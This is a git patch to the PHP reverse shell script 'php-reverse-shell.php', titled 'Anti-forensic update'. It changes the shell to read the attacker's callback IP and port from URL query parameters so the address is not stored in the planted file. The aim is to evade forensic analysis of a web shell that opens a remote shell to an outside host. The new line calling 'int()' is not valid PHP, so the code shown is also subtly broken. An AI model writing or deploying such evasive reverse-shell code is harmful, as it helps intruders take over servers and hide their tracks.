From f3077fa29d5e2fcdc809a847d0b38675f58189a2 Mon Sep 17 00:00:00 2001
From: Tiago Teixeira <tiago.t@sapo.pt>
Date: Sun, 15 Apr 2018 15:20:51 +0100
Subject: [PATCH] Anti-forensic update

Get IP and PORT from parameters, instead of hardcoding them.

Still accessible from access logs tho...
---
 php-reverse-shell.php | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/php-reverse-shell.php b/php-reverse-shell.php
index 2503b71..31466aa 100755
--- a/php-reverse-shell.php
+++ b/php-reverse-shell.php
@@ -44,10 +44,18 @@
 // -----
 // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
 
+
+// get IP and PORT from parameters, instead of hardcoding them
+if(!isset($_GET['ip'])||!isset($_GET['port'])||empty($_GET['ip'])||empty($_GET['port']))
+{
+	printit("Missing parameters");
+	exit(1);
+}
+
 set_time_limit (0);
 $VERSION = "1.0";
-$ip = '127.0.0.1';  // CHANGE THIS
-$port = 1234;       // CHANGE THIS
+$ip = $_GET['ip'];
+$port = int($_GET['port']);
 $chunk_size = 1400;
 $write_a = null;
 $error_a = null;